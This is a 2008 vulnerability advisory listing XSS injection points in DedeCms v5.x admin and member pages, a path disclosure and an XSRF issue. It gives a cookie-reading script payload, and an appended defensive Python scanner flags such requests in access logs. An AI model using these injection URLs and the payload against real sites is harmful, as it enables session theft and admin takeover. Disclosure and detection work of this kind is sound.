# .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A
# Public release vulnz: {26-08-2008 Sun}
# Class: Input Validation Error
# Original Advisory: http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory: http://www.xssing.com/index.php?x=3&y=53

- XSS -

[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]

- PHP Path Disclosure -

[DedeCms WebSite]/include/dialog/

- XSRF -

[DedeCms WebSite]/dede/sys_info.php?

This page is vulnerable to XSRF. The edit___cfg_beian, edit___cfg_keywords, etc. parameters are not checked for malicious code: if an attacker writes an "end of textarea" </textarea> tag, the result is an XSS alert :)

[XSS Code] : </script>'"><script>alert(document.cookie)</script>
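
A defender-side check for the endpoints listed above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests where one of the reported parameters carries markup characters after URL decoding. The combined log format, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Endpoint -> parameters the advisory reports as injectable.
REPORTED = {
    "/dede/catalog_tree.php": {"f", "v", "bt"},
    "/dede/content_list.php": {"arcrank", "cid", "keyword", "orderby",
                               "channelid", "adminid"},
    "/include/dialog/select_images.php": {"f", "imgstick"},
    "/dede/login.php": {"gotopage"},
    "/dede/article_keywords_select.php": {"f"},
    "/dede/file_pic_view.php": {"activepath"},
    "/dede/pic_view.php": {"activepath"},
    "/member/login.php": {"gourl"},
}
MARKUP = re.compile(r"[<>\"']")  # needed to leave an attribute, tag or script string
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # assumed combined log format

def suspicious_params(url):
    """Return sorted (param, decoded value) pairs: reported parameter carrying markup."""
    parts = urlsplit(url)
    # DedeCms may live in a subdirectory, so match on the path suffix.
    params = next((p for path, p in REPORTED.items() if parts.path.endswith(path)), None)
    if params is None:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote_plus(value)  # second decode catches double encoding (%253C)
        if name in params and MARKUP.search(decoded):
            hits.append((name, decoded))
    return sorted(hits)

def scan(lines):
    """Return [(line number, hits)] for log lines that match."""
    found = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            found.append((number, hits))
    return found

# Constructed sample lines (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /dede/content_list.php?channelid=1&cid=0&adminid=3 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cms/member/login.php?gourl=%253Cscript%253E HTTP/1.1" 200 400',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]
```

Legitimate values that contain quotes, such as a search keyword, also match, so treat hits as candidates for review rather than confirmed attempts.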